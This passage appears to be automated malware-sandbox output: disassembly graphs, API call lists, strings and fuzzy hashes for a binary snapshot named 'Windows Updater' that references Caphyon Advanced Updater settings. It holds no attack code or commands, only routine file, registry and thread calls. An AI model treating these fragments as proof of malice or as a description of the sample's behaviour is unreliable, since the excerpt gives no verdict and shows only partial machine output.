                                                                                                                                                                                                                                                                          • Instruction ID: 80908ba650ae03d77812238d87f4e7fa2852d4d1528f055812c2d0ea54bd884f
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b0a241787a9b721b8736c5f7a80261ac13ddd685327cf0cba18e8bbf8f62bc3f
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FCB1C131A00209DFDB64CF68C855BEEB7F5FF05714F248269E816A7292EB319E40CB90
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • CreateFileW.KERNEL32(00000000,C0000000,00000000,0000000C,?,00000080,00000000), ref: 0008C44D
                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 0008C57C
                                                                                                                                                                                                                                                                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0008C466
                                                                                                                                                                                                                                                                            • Part of subcall function 00064250: GetProcessHeap.KERNEL32 ref: 000642A5
                                                                                                                                                                                                                                                                            • Part of subcall function 00087CF0: InitializeCriticalSection.KERNEL32(?,8726ECAD,?), ref: 00087D2D
                                                                                                                                                                                                                                                                            • Part of subcall function 00087CF0: EnterCriticalSection.KERNEL32(?,8726ECAD,?), ref: 00087D3A
                                                                                                                                                                                                                                                                            • Part of subcall function 00087CF0: GetCurrentProcessId.KERNEL32( [PID=,00000006,0011F794,00000002), ref: 00087DD8
                                                                                                                                                                                                                                                                            • Part of subcall function 00087CF0: GetCurrentThreadId.KERNEL32 ref: 00087DF7
                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 0008CB87
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000001C.00000002.2533254784.0000000000061000.00000020.00000001.01000000.0000001F.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2533231425.0000000000060000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2534122744.000000000010F000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2534199498.000000000013C000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2534273383.000000000013F000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_28_2_60000_Windows Updater.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: CriticalCurrentFileProcessSection$CloseCreateEnterErrorHandleHeapInitializeLastPointerThread
                                                                                                                                                                                                                                                                          • String ID: %$AsyncDownloadThread read 0 bytes.$CreateSubFolders() failed$Creation of file to download on disk failed$Failed to saved in file the bytes read$S-1-1-0$S-1-5-18
                                                                                                                                                                                                                                                                          • API String ID: 3757555869-250281917
                                                                                                                                                                                                                                                                          • Opcode ID: 3f262fb6da4131ef9e593204a384b03b23738bf49dea0e20f97594ec1a1713f2
                                                                                                                                                                                                                                                                          • Instruction ID: 7aa275be8d1aa065110b3ba5d324feafca41a13c3b4d68757dffbd3578daf238
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3f262fb6da4131ef9e593204a384b03b23738bf49dea0e20f97594ec1a1713f2
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BA62BF70A00609DFEB54EF64C889FAE7BF1BF04314F148169E8959B292DB70DD45CBA1
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                          control_flow_graph 1499 689f0-68a76 1500 68a7c-68a9f LoadLibraryW 1499->1500 1501 68c7a-68cd3 call d8165 call 68680 1499->1501 1502 68aa1-68aba GetLastError 1500->1502 1503 68abf-68acd GetProcAddress 1500->1503 1517 68d6e-68d7e call d8160 1501->1517 1518 68cd9-68ce2 GetLastError 1501->1518 1505 68f10-68f23 1502->1505 1506 68acf-68af6 FreeLibrary GetLastError 1503->1506 1507 68afb-68b26 FreeLibrary 1503->1507 1506->1505 1512 68b38-68ba0 call 68680 * 2 LookupAccountSidW 1507->1512 1513 68b28-68b2e GetLastError 1507->1513 1531 68ba6-68baf GetLastError 1512->1531 1532 68c48-68c75 call d8160 * 2 1512->1532 1514 68b31-68b33 1513->1514 1514->1505 1528 68d81 1517->1528 1520 68ce8-68d3c call d8160 call d8165 call d8160 call 68680 1518->1520 1521 68d69-68d6c 1518->1521 1520->1517 1588 68d3e-68d4f GetLastError call d8160 1520->1588 1525 68d52-68d67 call d8160 1521->1525 1525->1528 1533 68d84-68d8d 1528->1533 1536 68c10-68c43 call d8160 * 2 1531->1536 1537 68bb1-68c08 call d8160 call 68680 call d8160 call 68680 LookupAccountSidW 1531->1537 1532->1533 1533->1514 1541 68d93-68d9a 1533->1541 1536->1505 1537->1532 1599 68c0a GetLastError 1537->1599 1547 68d9c 1541->1547 1548 68deb 1541->1548 1547->1548 1553 68dc7-68dce 1547->1553 1554 68db5-68dbc 1547->1554 1555 68de2-68de9 1547->1555 1556 68da3-68daa 1547->1556 1557 68dd0-68dd7 1547->1557 1558 68dbe-68dc5 1547->1558 1559 68dac-68db3 1547->1559 1560 68dd9-68de0 1547->1560 1562 68df2-68e14 1548->1562 1553->1562 1554->1562 1555->1562 1556->1562 1557->1562 1558->1562 1559->1562 1560->1562 1566 68e16-68e1d 1562->1566 1567 68e5f-68e76 1562->1567 1572 68e1f-68e24 1566->1572 1573 68e2d-68e2f 1566->1573 1570 68e80-68e87 1567->1570 1571 68e78-68e7d 1567->1571 1579 68e8a-68e98 1570->1579 1571->1570 1574 68f26-68f2b call 623d0 1572->1574 1575 68e2a 1572->1575 1576 68e31-68e36 1573->1576 1577 68e38-68e3d 1573->1577 1594 68f30-68f3a call 623d0 1574->1594 1575->1573 1580 68e47-68e55 call e1a2f 1576->1580 1577->1579 1581 68e3f-68e45 1577->1581 1585 68ede-68ef3 1579->1585 1586 68e9a-68ea1 1579->1586 1580->1579 1603 68e57-68e5d 1580->1603 1581->1579 1581->1580 1592 68f04-68f0b 1585->1592 1593 68ef5-68f00 1585->1593 1590 68eb4-68eb6 1586->1590 1591 68ea3-68eb2 1586->1591 1588->1525 1595 68ebd-68ebf 1590->1595 1596 68eb8-68ebb 1590->1596 1591->1590 1591->1594 1600 68f0e 1592->1600 1593->1592 1595->1600 1606 68ec1-68ec7 1595->1606 1605 68ec9-68ed7 call e1a2f 1596->1605 1599->1536 1600->1505 1603->1567 1605->1600 1609 68ed9-68edc 1605->1609 1606->1600 1606->1605 1609->1585
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • LoadLibraryW.KERNEL32(Advapi32.dll,8726ECAD,00000000), ref: 00068A81
                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00068AAF
                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,ConvertStringSidToSidW), ref: 00068AC5
                                                                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000), ref: 00068ADE
                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00068AEB
                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00068CD9
                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00068D3E
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000001C.00000002.2533254784.0000000000061000.00000020.00000001.01000000.0000001F.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2533231425.0000000000060000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2534122744.000000000010F000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2534199498.000000000013C000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2534273383.000000000013F000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_28_2_60000_Windows Updater.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ErrorLast$Library$AddressFreeLoadProc
                                                                                                                                                                                                                                                                          • String ID: Advapi32.dll$ConvertStringSidToSidW
                                                                                                                                                                                                                                                                          • API String ID: 2084285179-1129428314
                                                                                                                                                                                                                                                                          • Opcode ID: 1482a73d3aed16ea228eaa89774c7221889880889bb6f3102865fa8ac73d6f13
                                                                                                                                                                                                                                                                          • Instruction ID: 483758dc89d79aa26abbaf8805aa11397b2c81805d3bced0a569faced9395c11
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1482a73d3aed16ea228eaa89774c7221889880889bb6f3102865fa8ac73d6f13
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 90F18DB1C01209EFDB10CF94D9457DEBBB6FF08314F248229E915B7281EB75AA45CBA1
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                          control_flow_graph 2038 b6950-b69a3 GetModuleFileNameW 2039 b69a6-b69af 2038->2039 2039->2039 2040 b69b1-b69c9 call 622b0 2039->2040 2043 b69cf-b69ed call 65d30 2040->2043 2044 b6c17-b6c1c call ce730 2040->2044 2051 b69ef 2043->2051 2052 b69f1-b69f3 2043->2052 2047 b6c21-b6c23 2044->2047 2049 b6c29-b6c2f GetLastError 2047->2049 2050 b6a27-b6a3b call d92fa 2047->2050 2053 b6ccb-b6ced call d7c97 2049->2053 2061 b6a3d-b6a44 2050->2061 2062 b6a86-b6a95 call d92fa 2050->2062 2051->2052 2054 b69f9-b69ff 2052->2054 2055 b69f5-b69f7 2052->2055 2060 b6a00-b6a09 2054->2060 2058 b6a0f-b6a22 call 63430 call 63c90 2055->2058 2058->2050 2060->2060 2064 b6a0b-b6a0d 2060->2064 2061->2062 2066 b6a46-b6a7c call 67870 call 685d0 2061->2066 2073 b6adc-b6b13 call b65f0 call 685d0 2062->2073 2074 b6a97-b6a9c 2062->2074 2064->2058 2066->2062 2081 b6a7e-b6a81 2066->2081 2087 b6b1d-b6b71 CopyFileW SetFileAttributesW call b65f0 call 685d0 2073->2087 2088 b6b15-b6b18 2073->2088 2074->2073 2077 b6a9e-b6ad2 call 69880 call 685d0 2074->2077 2077->2073 2089 b6ad4-b6ad7 2077->2089 2081->2062 2094 b6b7b-b6bca CreateFileW WriteFile 2087->2094 2095 b6b73-b6b76 2087->2095 2088->2087 2089->2073 2096 b6bea-b6bfa 2094->2096 2097 b6bcc-b6bce 2094->2097 2095->2094 2100 b6bfc-b6bff 2096->2100 2101 b6c06-b6c0f call 64250 2096->2101 2098 b6bdc-b6be5 DeleteFileW 2097->2098 2099 b6bd0-b6bda 2097->2099 2098->2096 2099->2098 2100->2101 2106 b6cf0-b6cfa call 623d0 2101->2106 2107 b6c15-b6c54 call 632c0 2101->2107 2114 b6c7c-b6c8e call b6dd0 2107->2114 2115 b6c56-b6c5c 2107->2115 2119 b6c93-b6ca8 2114->2119 2116 b6c60-b6c69 2115->2116 2116->2116 2118 b6c6b-b6c77 call 63430 2116->2118 2118->2114 2120 b6caa-b6cad 2119->2120 2121 b6cb2-b6cc9 call b6d00 call 68280 2119->2121 2120->2121 2121->2053
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetModuleFileNameW.KERNEL32(?,00000104,8726ECAD,?,?,00000000,?,?,00000000,00107DCD,000000FF), ref: 000B699A
                                                                                                                                                                                                                                                                          • _wcsrchr.LIBVCRUNTIME ref: 000B6A2C
                                                                                                                                                                                                                                                                          • _wcsrchr.LIBVCRUNTIME ref: 000B6A8B
                                                                                                                                                                                                                                                                          • CopyFileW.KERNEL32(?,?,00000000,00000000,?,.exe,?,?,?,00000000,?,?,00000000,00107DCD,000000FF), ref: 000B6B26
                                                                                                                                                                                                                                                                          • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,00000000,?,?,00000000,00107DCD,000000FF), ref: 000B6B34
                                                                                                                                                                                                                                                                          • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,00000000,?,.ini,?,?,?,00000000), ref: 000B6B90
                                                                                                                                                                                                                                                                          • WriteFile.KERNEL32(00000000,?,00000002,?,00000000,?,?,?,00000000,?,?,00000000,00107DCD,000000FF), ref: 000B6BBD
                                                                                                                                                                                                                                                                          • DeleteFileW.KERNEL32(?,?,?,?,00000000,?,?,00000000,00107DCD,000000FF), ref: 000B6BDF
                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,00000000,?,?,00000000,00107DCD,000000FF), ref: 000B6C29
                                                                                                                                                                                                                                                                            • Part of subcall function 00063430: FindResourceW.KERNEL32(00000000,00000001,00000006,?,00000000,?,00000000,?), ref: 000632F8
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000001C.00000002.2533254784.0000000000061000.00000020.00000001.01000000.0000001F.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2533231425.0000000000060000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2534122744.000000000010F000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2534199498.000000000013C000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2534273383.000000000013F000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_28_2_60000_Windows Updater.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: File$_wcsrchr$AttributesCopyCreateDeleteErrorFindLastModuleNameResourceWrite
                                                                                                                                                                                                                                                                          • String ID: .exe$.ini$RealUpdaterPath$aiu
                                                                                                                                                                                                                                                                          • API String ID: 2718112306-2284992342
                                                                                                                                                                                                                                                                          • Opcode ID: e1a4806de4e7efa4109f09f9c21f1b4fccc3518efca7d90a99f041dac07581aa
                                                                                                                                                                                                                                                                          • Instruction ID: caf34cde0b80467668bf1ad703cd09473a20d07987a354b41f561435b5ff532b
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e1a4806de4e7efa4109f09f9c21f1b4fccc3518efca7d90a99f041dac07581aa
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 77B1D47060060AAFDB14DF68CD59BEEB7B5FF44310F148228E416976D2EB74A945CB90
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                          control_flow_graph 3210 c2520-c255c 3211 c2952 3210->3211 3212 c2562-c2566 3210->3212 3213 c2957-c2969 3211->3213 3212->3211 3214 c256c-c2572 3212->3214 3214->3211 3215 c2578-c257f 3214->3215 3215->3211 3216 c2585-c2590 3215->3216 3217 c25b2-c25be call afa40 3216->3217 3218 c2592-c259e call c4d00 3216->3218 3224 c25ec-c263c call 9d200 3217->3224 3225 c25c0-c25da PostThreadMessageW 3217->3225 3218->3217 3223 c25a0-c25ad 3218->3223 3223->3213 3230 c27e5-c27ee call 9d2b0 3224->3230 3231 c2642-c26aa call 624d0 call 9e910 GetActiveWindow 3224->3231 3226 c25dc GetLastError 3225->3226 3227 c25e2-c25e7 3225->3227 3226->3227 3227->3213 3234 c27f3 3230->3234 3241 c26ac-c26b6 call d6a70 3231->3241 3242 c26c2-c26f4 call d6b72 call 94310 DialogBoxParamW 3231->3242 3236 c27f5-c27f7 3234->3236 3238 c27fd-c2803 3236->3238 3239 c2899-c28a3 3236->3239 3238->3239 3245 c2809-c280f 3238->3245 3243 c28f5-c291d call cf3c0 3239->3243 3244 c28a5-c28c3 3239->3244 3241->3242 3258 c26b8-c26c0 SetLastError 3241->3258 3264 c26fd-c2702 3242->3264 3272 c26f6 3242->3272 3262 c291f-c2922 3243->3262 3263 c2927-c2943 3243->3263 3247 c28cd-c28e9 3244->3247 3248 c28c5-c28c8 3244->3248 3245->3239 3249 c2815-c281b 3245->3249 3254 c28eb-c28ee 3247->3254 3255 c28f3 3247->3255 3248->3247 3249->3239 3253 c281d-c2823 3249->3253 3253->3239 3259 c2825-c282b 3253->3259 3254->3255 3261 c2883-c2894 call 933c0 3255->3261 3258->3264 3259->3239 3265 c282d-c2833 3259->3265 3261->3213 3262->3263 3268 c294d 3263->3268 3269 c2945-c2948 3263->3269 3273 c2729 3264->3273 3274 c2704-c2718 GetExitCodeThread 3264->3274 3265->3239 3271 c2835-c2853 3265->3271 3268->3261 3269->3268 3275 c285d-c2879 3271->3275 3276 c2855-c2858 3271->3276 3272->3264 3279 c272b-c2749 3273->3279 3277 c271f-c2727 GetLastError 3274->3277 3278 c271a-c271d 3274->3278 3275->3261 3282 c287b-c287e 3275->3282 3276->3275 3277->3279 3278->3279 3280 c274b-c274e 3279->3280 3281 c2753-c2766 3279->3281 3280->3281 3283 c276e-c2782 3281->3283 3284 c2768-c2769 call d6b1c 3281->3284 3282->3261 3286 c278c-c279c 3283->3286 3287 c2784-c2787 3283->3287 3284->3283 3286->3236 3288 c279e-c27ac WaitForSingleObject 3286->3288 3287->3286 3289 c27ae-c27c4 GetExitCodeThread 3288->3289 3290 c27da-c27e3 CloseHandle 3288->3290 3289->3290 3291 c27c6-c27cd 3289->3291 3290->3236 3291->3290 3292 c27cf-c27d4 TerminateThread 3291->3292 3292->3290
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • PostThreadMessageW.USER32(?,?,00000001,?), ref: 000C25D2
                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 000C25DC
                                                                                                                                                                                                                                                                          • GetActiveWindow.USER32 ref: 000C269C
                                                                                                                                                                                                                                                                          • SetLastError.KERNEL32(0000000E), ref: 000C26BA
                                                                                                                                                                                                                                                                          • GetExitCodeThread.KERNEL32(?,00000000), ref: 000C2710
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000001C.00000002.2533254784.0000000000061000.00000020.00000001.01000000.0000001F.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2533231425.0000000000060000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2534122744.000000000010F000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2534199498.000000000013C000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2534273383.000000000013F000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_28_2_60000_Windows Updater.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ErrorLastThread$ActiveCodeExitMessagePostWindow
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 1742873593-0
                                                                                                                                                                                                                                                                          • Opcode ID: 6ab603af32c8de4f13eb7d1fda84ad870636ded751e19a729c074bdfbd0db74d
                                                                                                                                                                                                                                                                          • Instruction ID: cbb5388e657b25408952fcd41bfcf775beeb459447870f3604f00b3d504d8d90
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6ab603af32c8de4f13eb7d1fda84ad870636ded751e19a729c074bdfbd0db74d
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 58E19B70900248DFEB11CF68C888BDDBBF9AF04314F14826DF8189B692D7B5D989CB90
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                          control_flow_graph 3529 c48f0-c4941 call 64250 3532 c4947-c4968 call 632c0 3529->3532 3533 c4cf0-c4cfa call 623d0 3529->3533 3539 c4979-c499d call 64250 3532->3539 3540 c496a-c4974 call 63430 3532->3540 3539->3533 3544 c49a3-c49f3 call 685d0 RegOpenKeyExW 3539->3544 3540->3539 3548 c49fd-c4a06 call 64250 3544->3548 3549 c49f5-c49f8 3544->3549 3548->3533 3552 c4a0c-c4a24 call 64250 3548->3552 3549->3548 3552->3533 3556 c4a2a-c4a48 call 632c0 3552->3556 3560 c4a59-c4a81 call 67c10 3556->3560 3561 c4a4a-c4a54 call 63430 3556->3561 3565 c4a8b-c4a95 call 6d780 3560->3565 3566 c4a83-c4a86 3560->3566 3561->3560 3569 c4b0e-c4b2c GetModuleFileNameW call 64250 3565->3569 3570 c4a97-c4abd call 624d0 3565->3570 3566->3565 3569->3533 3575 c4b32-c4b4f call 632c0 3569->3575 3576 c4abf-c4ac2 3570->3576 3577 c4ac7-c4ad3 3570->3577 3588 c4b51-c4b54 3575->3588 3589 c4b73-c4b97 call 685d0 3575->3589 3576->3577 3578 c4adc-c4afb 3577->3578 3579 c4ad5-c4ad6 RegCloseKey 3577->3579 3580 c4cca-c4ced call d7c97 3578->3580 3581 c4b01-c4b09 3578->3581 3579->3578 3581->3580 3591 c4b57-c4b60 3588->3591 3594 c4b99-c4b9c 3589->3594 3595 c4ba1-c4bb0 call d92fa 3589->3595 3591->3591 3593 c4b62-c4b6e call 63430 3591->3593 3593->3589 3594->3595 3599 c4c4d-c4c82 call 622b0 call 624d0 3595->3599 3600 c4bb6-c4bbe 3595->3600 3609 c4c8c-c4c98 3599->3609 3610 c4c84-c4c87 3599->3610 3600->3599 3602 c4bc4-c4c01 call 69880 call 890c0 3600->3602 3612 c4c0b-c4c1f 3602->3612 3613 c4c03-c4c06 3602->3613 3614 c4c9a-c4c9b RegCloseKey 3609->3614 3615 c4ca1-c4cc0 3609->3615 3610->3609 3616 c4c29-c4c35 3612->3616 3617 c4c21-c4c24 3612->3617 3613->3612 3614->3615 3615->3580 3618 c4cc2-c4cc5 3615->3618 3619 c4c3e-c4c45 3616->3619 3620 c4c37-c4c38 RegCloseKey 3616->3620 3617->3616 3618->3580 3619->3599 3620->3619
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                            • Part of subcall function 00064250: GetProcessHeap.KERNEL32 ref: 000642A5
                                                                                                                                                                                                                                                                            • Part of subcall function 00063430: FindResourceW.KERNEL32(00000000,00000001,00000006,?,00000000,?,00000000,?), ref: 000632F8
                                                                                                                                                                                                                                                                          • RegOpenKeyExW.KERNEL32(?,?,00000000,00020019,?,?,?,?,?,?,?,?,0010AE26,000000FF), ref: 000C49D6
                                                                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?,?,ConfigFilePath,?,?,?,?,?,?,0010AE26,000000FF), ref: 000C4AD6
                                                                                                                                                                                                                                                                          • GetModuleFileNameW.KERNEL32(00000000,00000104,ConfigFilePath,?,?,?,?,?,?,0010AE26,000000FF), ref: 000C4B1D
                                                                                                                                                                                                                                                                          • _wcsrchr.LIBVCRUNTIME ref: 000C4BA6
                                                                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?,?,?,-00000010,?,?,?,?,?,?,0010AE26,000000FF), ref: 000C4C38
                                                                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?,?,.ini,00000004,?,-00000010,?,?,?,?,?,?,0010AE26,000000FF), ref: 000C4C9B
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000001C.00000002.2533254784.0000000000061000.00000020.00000001.01000000.0000001F.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2533231425.0000000000060000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2534122744.000000000010F000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2534199498.000000000013C000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2534273383.000000000013F000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_28_2_60000_Windows Updater.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Close$FileFindHeapModuleNameOpenProcessResource_wcsrchr
                                                                                                                                                                                                                                                                          • String ID: .ini$ConfigFilePath$Software\Caphyon\Advanced Updater\Settings
                                                                                                                                                                                                                                                                          • API String ID: 339666702-2585319053
                                                                                                                                                                                                                                                                          • Opcode ID: 23afabf3ac4c2371527b25977a1788a089b087e786ed15c717a69dbf9d60602f
                                                                                                                                                                                                                                                                          • Instruction ID: 4f676df049c906ea33893ac6d16a81340ddef51f5bb2d8bb5bd1328c8f9592e9
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 23afabf3ac4c2371527b25977a1788a089b087e786ed15c717a69dbf9d60602f
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 51D19E7090120A9FDB00DFA8C959BEEB7F5BF44314F148259E415AB2A2DB749E04CBA1
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                          control_flow_graph 3621 9e3d0-9e3fe 3622 9e43c-9e446 3621->3622 3623 9e400-9e40a call afa40 3621->3623 3625 9e448-9e44a 3622->3625 3626 9e426-9e439 3622->3626 3623->3622 3629 9e40c-9e424 ShowWindow * 2 3623->3629 3628 9e450-9e452 3625->3628 3630 9e458-9e45a 3628->3630 3631 9e624-9e62b call 68770 3628->3631 3629->3626 3630->3631 3632 9e460-9e46a 3630->3632 3636 9e630-9e63a call 623d0 3631->3636 3634 9e479-9e496 call b64c0 call b6950 3632->3634 3635 9e46c-9e475 3632->3635 3644 9e49c-9e4ac call 9dd30 3634->3644 3645 9e5ff-9e621 call 9e640 3634->3645 3635->3628 3638 9e477 3635->3638 3638->3626 3644->3645 3650 9e4b2-9e4bb call 64250 3644->3650 3650->3636 3653 9e4c1-9e4ff call 624d0 call b6710 3650->3653 3659 9e5e3-9e5f5 3653->3659 3660 9e505-9e515 call b6f10 3653->3660 3659->3645 3662 9e5f7-9e5fa 3659->3662 3660->3659 3664 9e51b-9e520 call b71f0 3660->3664 3662->3645 3666 9e525-9e529 3664->3666 3666->3659 3667 9e52f-9e53b 3666->3667 3668 9e5e1 3667->3668 3669 9e541-9e572 call b2ef0 OpenEventW 3667->3669 3668->3659 3672 9e57c-9e581 3669->3672 3673 9e574-9e576 WaitForSingleObject 3669->3673 3674 9e591-9e596 3672->3674 3675 9e583-9e58a CloseHandle 3672->3675 3673->3672 3676 9e598-9e59f UnmapViewOfFile 3674->3676 3677 9e5a6-9e5b3 3674->3677 3675->3674 3676->3677 3678 9e5c3-9e5d7 3677->3678 3679 9e5b5-9e5bc CloseHandle 3677->3679 3678->3668 3680 9e5d9-9e5dc 3678->3680 3679->3678 3680->3668
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                            • Part of subcall function 000AFA40: GetModuleFileNameW.KERNEL32(00000000,00000104,00000104), ref: 000AFA6A
                                                                                                                                                                                                                                                                            • Part of subcall function 000AFA40: RegisterWindowMessageW.USER32(00000000,?), ref: 000AFABD
                                                                                                                                                                                                                                                                          • ShowWindow.USER32(00000000,00000002,8726ECAD,?,?,00000000), ref: 0009E41A
                                                                                                                                                                                                                                                                          • ShowWindow.USER32(00000000,00000001,?,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0009E424
                                                                                                                                                                                                                                                                            • Part of subcall function 00068770: RaiseException.KERNEL32(00000000,00000000,00000000,00000000,000D679F,C000008C,00000001,?,000D67D0,00000000,?,00000000,?,00063D67,00000000,8726ECAD), ref: 0006877C
                                                                                                                                                                                                                                                                          • OpenEventW.KERNEL32(00100000,00000000,00000000,00000000,00000001,?,00000000), ref: 0009E55A
                                                                                                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(00000000,00000000), ref: 0009E576
                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 0009E584
